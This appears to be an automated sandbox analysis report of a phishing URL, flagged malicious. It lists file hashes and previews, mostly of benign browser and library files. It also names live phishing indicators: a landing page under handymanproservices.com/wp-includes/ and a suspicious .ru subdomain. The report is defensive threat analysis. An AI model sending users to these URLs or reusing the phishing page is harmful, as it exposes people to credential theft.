                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                            Classification:mal52.phis.win@18/30@26/15
                                                                                                                                                                                                                            EGA Information:Failed
                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): SIHClient.exe, svchost.exe
                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 216.58.206.67, 142.250.185.110, 108.177.15.84, 142.250.184.206, 142.250.186.78, 142.250.186.46, 199.232.210.172, 2.23.77.188, 172.217.16.202, 142.250.185.234, 142.250.186.42, 142.250.185.202, 142.250.184.234, 142.250.186.74, 142.250.185.170, 172.217.16.138, 142.250.186.106, 142.250.181.234, 142.250.186.138, 142.250.184.202, 216.58.206.42, 142.250.186.170, 142.250.74.202, 142.250.185.74, 142.250.185.174, 142.250.184.238, 142.250.185.138, 142.250.186.131, 142.250.186.142, 142.250.186.174, 142.250.185.67, 216.58.206.78, 34.104.35.123, 20.12.23.50, 2.19.106.160, 13.107.253.45
                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, azureedge-t-prod.trafficmanager.net, clients.l.google.com
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                            • VT rate limit hit for: https://handymanproservices.com/wp-includes/
                                                                                                                                                                                                                            No simulations
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1558
                                                                                                                                                                                                                            Entropy (8bit):5.11458514637545
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:OBOCrYJ4rYJVwUCLHDy43HV713XEyMmZ3teTHn:LCrYJ4rYJVwUCHZ3Z13XtdUTH
                                                                                                                                                                                                                            MD5:EE002CB9E51BB8DFA89640A406A1090A
                                                                                                                                                                                                                            SHA1:49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
                                                                                                                                                                                                                            SHA-256:3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
                                                                                                                                                                                                                            SHA-512:D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1864
                                                                                                                                                                                                                            Entropy (8bit):6.018989605004616
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:p/hUI1OwEU3AdIq7ak68O40E2szOxxUJ8BPFkf31U4PrHfqY3J5D:RnOwtQIq7aZ40E2sYUJAYRr/qYZ5D
                                                                                                                                                                                                                            MD5:C4709C1D483C9233A3A66A7E157624EA
                                                                                                                                                                                                                            SHA1:99A000EB5FE5CC1E94E3155EE075CD6E43DC7582
                                                                                                                                                                                                                            SHA-256:225243DC75352D63B0B9B2F48C8AAA09D55F3FB9E385741B12A1956A941880D9
                                                                                                                                                                                                                            SHA-512:B45E1FD999D1340CC5EB5A49A4CD967DC736EA3F4EC8B02227577CC3D1E903341BE3217FBB0B74765C72085AC51C63EEF6DCB169D137BBAF3CC49E21EA6468D7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJMSUNFTlNFIiwicm9vdF9oYXNoIjoiUGIwc2tBVUxaUzFqWldTQnctV0hIRkltRlhVcExiZDlUcVkwR2ZHSHBWcyJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJVczFpOUt3Zm5uMThTVVR1RVItRXBDTTMwVzFkNTc0cGJwUlJSdGJYM0JVIn0seyJwYXRoIjoic2V0cy5qc29uIiwicm9vdF9oYXNoIjoiM0hiWThLc3poeEF6UDVSUU9fZEpvZGNwbEtpRXR0RWh2UmZMZEtjSTdjZyJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6ImdvbnBlbWRna2pjZWNkZ2JuYWFiaXBwcGJtZ2ZnZ2JlIiwiaXRlbV92ZXJzaW9uIjoiMjAyNC4xMS44LjAiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"lGxZ1-AH7F8MftKSBdZiFULmC8hZkIHy1_2XIoU81Z5mK0wHVwNV7-55CBTcuuvKjTje-AnKLDoG4S0A_Jeg4lSQK5V_Q4f6JVqp5Vj_ge86YkRZEv4m1bjKRY4N17SHobwuH8Hc_kAugFIlG1LIDHnrm1N7ZWIqo3fVlnVqgSstmvFXAhBazgs1UYRi3hPjPM6e1q1i2N1mIUbxLvG41frGo2QJ8W5J3buUjzs-0y250k-YkadKAR0
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                            Entropy (8bit):3.820000180714897
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:SVzHL3phUmWRDNKydvgHVz:SBHLLUmWRbCp
                                                                                                                                                                                                                            MD5:BBEC7670A2519FEB0627F17D0C0B5276
                                                                                                                                                                                                                            SHA1:9C30B996F1B069F86EF7C0136DFAF7E614674DEA
                                                                                                                                                                                                                            SHA-256:670A6F6BBADAB2C2BE63898525FCAF72E7454739E77C04D120BC1A46B6694CAC
                                                                                                                                                                                                                            SHA-512:1ED4ED6AE2A2CBE86F9E8C6C7A2672EBB2F37DBE83D2BF09D875DB435ED63BF5F5CF60CA846865166F9A498095F6D61BD51B0A092E097430439E8A5A3A14CB15
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:1.03cccbb22b17080279ea1707c9ab093c59f4f4dd09580c841cfa794cb372228d
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):85
                                                                                                                                                                                                                            Entropy (8bit):4.462192586591686
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:rR6TAulhFphifFCmMARWHJqS1kULJVPY:F6VlM8aRWpqS1kSJVg
                                                                                                                                                                                                                            MD5:084E339C0C9FE898102815EAC9A7CDEA
                                                                                                                                                                                                                            SHA1:6ABF7EAAA407D2EAB8706361E5A2E5F776D6C644
                                                                                                                                                                                                                            SHA-256:52CD62F4AC1F9E7D7C4944EE111F84A42337D16D5DE7BE296E945146D6D7DC15
                                                                                                                                                                                                                            SHA-512:0B67A89F3EBFF6FEC3796F481EC2AFBAC233CF64FDC618EC6BA1C12AE125F28B27EE09E8CD0FADB8F6C8785C83929EA6F751E0DDF592DD072AB2CF439BD28534
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "First Party Sets",. "version": "2024.11.8.0".}
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):9817
                                                                                                                                                                                                                            Entropy (8bit):4.629347296880043
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:Mon4mvC4qX19s1blbw/BNKLcxbdmf56MFJtRTGXvcxN43uP+8qJl:v5C4ql7BkIVmtRTGXvcxBsl
                                                                                                                                                                                                                            MD5:8C702C686B703020BC0290BAFC90D7A0
                                                                                                                                                                                                                            SHA1:EB08FF7885B4C1DE3EF3D61E40697C0C71903E27
                                                                                                                                                                                                                            SHA-256:97D9E39021512305820F27B9662F0351E45639124F5BD29F0466E9072A9D0C62
                                                                                                                                                                                                                            SHA-512:6137D0ED10E6A27924ED3AB6A0C5F9B21EB0E16A876447DADABD88338198F31BB9D89EF8F0630F4573EA34A24FB3FD3365D7EA78A97BA10028A0758E0A550739
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:{"primary":"https://bild.de","associatedSites":["https://welt.de","https://autobild.de","https://computerbild.de","https://wieistmeineip.de"],"serviceSites":["https://www.asadcdn.com"]}.{"primary":"https://blackrock.com","associatedSites":["https://blackrockadvisorelite.it","https://cachematrix.com","https://efront.com","https://etfacademy.it","https://ishares.com"]}.{"primary":"https://cafemedia.com","associatedSites":["https://cardsayings.net","https://nourishingpursuits.com"]}.{"primary":"https://caracoltv.com","associatedSites":["https://noticiascaracol.com","https://bluradio.com","https://shock.co","https://bumbox.com","https://hjck.com"]}.{"primary":"https://carcostadvisor.com","ccTLDs":{"https://carcostadvisor.com":["https://carcostadvisor.be","https://carcostadvisor.fr"]}}.{"primary":"https://citybibleforum.org","associatedSites":["https://thirdspace.org.au"]}.{"primary":"https://cognitiveai.ru","associatedSites":["https://cognitive-ai.ru"]}.{"primary":"https://drimer.io","asso
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):48316
                                                                                                                                                                                                                            Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            URL:https://ajcs6.revishbos.ru/loray@la8j4pj
                                                                                                                                                                                                                            Preview:1
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):48316
                                                                                                                                                                                                                            Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):89501
                                                                                                                                                                                                                            Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (48129)
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):48130
                                                                                                                                                                                                                            Entropy (8bit):5.399803497944182
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:nCbU/Cru5h5qaq75KvO0fV9/KFHWlzQylGTZjVsgVX2TwDBslY1L8ep7K1oiSJvU:4ru5h5qaq7gGYV9y0cyl42TQs3
                                                                                                                                                                                                                            MD5:2F126AAB3C36533F73DE07E05B86C331
                                                                                                                                                                                                                            SHA1:263F8D2289C1043D39F174969A337C9CA18143F3
                                                                                                                                                                                                                            SHA-256:C865599323BE8BEDD10DD96818B4702B66F95BE7BEEE670E6E818EA15509B3B4
                                                                                                                                                                                                                            SHA-512:CC1E6F2D3A4642A5908D212F122F44D51186A8B872D36A73680B4E2CCF15C838941D86912C8F243AA6CE047DD81213E53A1CB218D695DDE134AE276CDCEEE81C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            URL:https://challenges.cloudflare.com/turnstile/v0/g/8a57887573f2/api.js
                                                                                                                                                                                                                            Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,g){try{var h=e[l](g),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function g(s){Ht(l,o,c,g,h,"next",s)}function h(s){Ht(l,o,c,g,h,"throw",s)}g(void 0)})}}function D(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):D(e,t)}function Ue(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function De(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Ue(e,c,a[c])})}return e}function Sr(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                                            Entropy (8bit):3.452819531114783
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Has6Ln:6sCn
                                                                                                                                                                                                                            MD5:CD598D2DCE38CFBA2981425AFD8CC5FF
                                                                                                                                                                                                                            SHA1:56C8577B18B89C77A6AC58B925F8ECAB11BEF02C
                                                                                                                                                                                                                            SHA-256:64BC0BCC655408713CCC3195B859007631C335758AAC8575658AC138509233E8
                                                                                                                                                                                                                            SHA-512:61797961E4747CA9CD7B3E6746E5243F7D9EF59B21B27911E974CEB68460C71ED438FEAAE6C7E1BC77A50E687D63A26623DB0AC1204DEAC60D094EFD0271C6FA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAmD6EbEs_ZYZxIFDa8aOOA=?alt=proto
                                                                                                                                                                                                                            Preview:CgkKBw2vGjjgGgA=
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (64964), with CRLF line terminators
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):353526
                                                                                                                                                                                                                            Entropy (8bit):6.0311691277423165
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:+ODDORezIlikECAtwafzsCNU1W9gor53/OR7uxc6RrA8EvhIajS4qbVw7Tvok:+KORVmptw6sCGA9gsJ/OR7VRWeSpRJk
                                                                                                                                                                                                                            MD5:860EB362B7B450610D0D1CE9A257112C
                                                                                                                                                                                                                            SHA1:E70BE83F6076F77F616E490EF7C1FD3B38B3F8D9
                                                                                                                                                                                                                            SHA-256:FB1EF61ACF95E5A480C4AECCB66C6CCE55EAD3A1530C8E082EEF3BB9E6F4A76F
                                                                                                                                                                                                                            SHA-512:D0EDF7E81B39B464158B494F602B51937A7873BEAF21FD7F2CA8AB6895B6C13D3ABC3729CFC9CFE00C5921D5F92489DFD3E766DB4EB5FCC5D7FE7E4326200857
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            URL:https://handymanproservices.com/wp-includes/
                                                                                                                                                                                                                            Preview:....<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>****---***</title>.. <style>.. body {.. font-family: "Segoe UI", "Segoe UI Web (West European)", -apple-system, BlinkMacSystemFont, Roboto, "Helvetica Neue", sans-serif;.. background-color: #f4f4f4;.. margin: 0;.. display: flex;.. justify-content: center;.. align-items: center;.. height: 100vh;.. color: #333;.. background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABioAAALkCAYAAACRC231AAAgAElEQVR4Xuy9S8ttzbImdNa3T/0WL4ggNgQbNuzYsWPHI0qBKIJYIGhDBBvasKEdQbCj5aVU1EIoCrRQERVRwQIvUKKoICL+Dc/e25kZ8UQ8T2RkjjHnu9ba33rXfPf+1hwjR17iHpER4/Llr/t7//zv/+jw92Vcm//kQTnNy6Prl7g6x9GZz7A2Sp864ATc6VqDVYdot7a17fEwFL9YD+9mx972Ksw+bsLp/+SxNz0u/J4Q4es2/HEd6584q+gJf3fg08xYylf0UwJmhdGAEZAeJ3sQl9USrKPEfpD4u+HM5yofxvr4y0OT9UUHitCpjjU
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):937
                                                                                                                                                                                                                            Entropy (8bit):7.737931820487441
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:2PUSIn/IylOgX9qCigRmHQxlCNebarFY9:2PLCHlOgXQ9Oie+rw
                                                                                                                                                                                                                            MD5:FC3B7BBE7970F47579127561139060E2
                                                                                                                                                                                                                            SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                                                                                                                                                                                            SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                                                                                                                                                                                            SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            URL:https://developers.cloudflare.com/favicon.png
                                                                                                                                                                                                                            Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 40128, version 1.0
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):40128
                                                                                                                                                                                                                            Entropy (8bit):7.994526034157349
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:768:Vce3jkow68wmT4IBX0tXdlSirS61gSjcz0GPwHbP+w2jec56O:VcI/iEEEtXdFJj+0GPwHbP+w5rO
                                                                                                                                                                                                                            MD5:9A01B69183A9604AB3A439E388B30501
                                                                                                                                                                                                                            SHA1:8ED1D59003D0DBE6360481017B44665153665FBE
                                                                                                                                                                                                                            SHA-256:20B535FA80C8189E3B87D1803038389960203A886D502BC2EF1857AFFC2F38D2
                                                                                                                                                                                                                            SHA-512:0E6795255B6EEA00B5403FD7E3B904D52776D49AC63A31C2778361262883697943AEDCB29FEEE85694BA6F19EAA34DDDB9A5BFE7118F4A25B4757E92C331FECA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2
